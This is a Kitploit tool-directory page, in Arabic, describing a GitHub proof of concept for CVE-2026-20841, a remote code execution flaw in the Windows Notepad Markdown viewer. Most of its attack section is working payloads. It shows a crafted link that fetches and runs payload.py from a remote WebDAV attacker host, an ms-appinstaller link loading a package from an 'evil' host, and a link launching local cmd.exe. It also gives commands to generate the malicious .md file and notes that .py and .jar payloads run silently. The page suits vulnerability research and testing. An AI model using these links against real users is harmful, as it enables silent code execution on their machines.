Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-20841 — إثبات مفهوم لاستغلال CVE-2026-20841، وهو ثغرة تنفيذ برمجيات عن بُعد (RCE) في مفكرة ويندوز عبر روابط ماركداون. يُنشئ ملفات .md مصمّمة خصيصًا لتفعيل حمولات عن بُعد، أو تحميل جانبي للتطبيقات، أو تنفيذ ملفات ثنائية محلية. | Kitploit
أدوات/GitHubGitHub/atiilla/cve-2026-20841
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubatiilla/cve-2026-20841

CVE-2026-20841

إثبات مفهوم لاستغلال CVE-2026-20841، وهو ثغرة تنفيذ برمجيات عن بُعد (RCE) في مفكرة ويندوز عبر روابط ماركداون. يُنشئ ملفات .md مصمّمة خصيصًا لتفعيل حمولات عن بُعد، أو تحميل جانبي للتطبيقات، أو تنفيذ ملفات ثنائية محلية.

عرض المستودع
54منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-20841 - تنفيذ التعليمات البرمجية عن بُعد في مفكرة Windows

إثبات مفهوم (PoC) لثغرة تنفيذ التعليمات البرمجية عن بُعد في عارض Markdown الخاص بمفكرة Windows. لا يقيّد محرك Markdown بروتوكولات URL، مما يسمح بتشغيل معالجات البروتوكولات التعسفية عبر روابط قابلة للنقر.

إخلاء المسؤولية

  1. ليس اكتشافي. يعود الفضل إلى الباحثين الأصليين في استشارة MSRC. هذا إعادة إنشاء لإثبات المفهوم.
  2. خطورة أقل مما يبدو. يتطلب أكثر من نقرة واحدة في معظم الحالات (انظر القيود). بنيت هذا لأن "ثغرة RCE في المفكرة" مضحكة جدًا لتفويتها.

نواقل الهجوم

1. الحمولة عن بُعد (file:///)

root@kitploit:~
[click](file:///\\attacker@5005\DavWWWRoot\payload.py)

يحل بروتوكول file:/// مسارات UNC البعيدة. اربط حمولة وسيقوم Windows بجلبها وتنفيذها عند النقر.

2. التحميل الجانبي للتطبيقات (ms-appinstaller://)

root@kitploit:~
[click](ms-appinstaller://?source=https://evil/xxx.appx)

يفتح مثبّت التطبيقات مع حزمة .appx/.msix مقدمة من المهاجم.

3. تنفيذ ملف ثنائي محلي (file://)

root@kitploit:~
[click](file://C:/windows/system32/cmd.exe)

يشغّل أي ملف قابل للتنفيذ موجود على القرص — cmd.exe، powershell.exe، mshta.exe، إلخ.

الاستخدام

ينشئ كلا السكربتين ملف poc.md يحتوي على رابط مصمم في الدليل الحالي.

root@kitploit:~
node poc.js <host> <port> <payload/path>
python poc.py <host> <port> <payload/path>
root@kitploit:~
# مثال
node poc.js 192.168.1.100 5005 hello.py
notepad poc.md

اختبر الحمولات في payloads/.

القيود

  1. الامتدادات الخطيرة لا تزال موقوفة. .exe، .lnk، .vbs وما شابهها تُطلق تحذير أمان من Windows بغض النظر عن سلوك المفكرة.
  2. امتدادات المفسرات تتجاوز التحذير. يتم تنفيذ .py و .jar بصمت إذا كان Python أو Java مثبتًا على الهدف.

ملاحظات

  • إصدارات المفكرة المعرضة للخطر متوفرة على Uptodown. تحقق من التوقيع الرقمي قبل الاستخدام.
  • اختبر فقط في جهاز افتراضي (VM).

ابقَ آمنًا!

تنزيل الأداة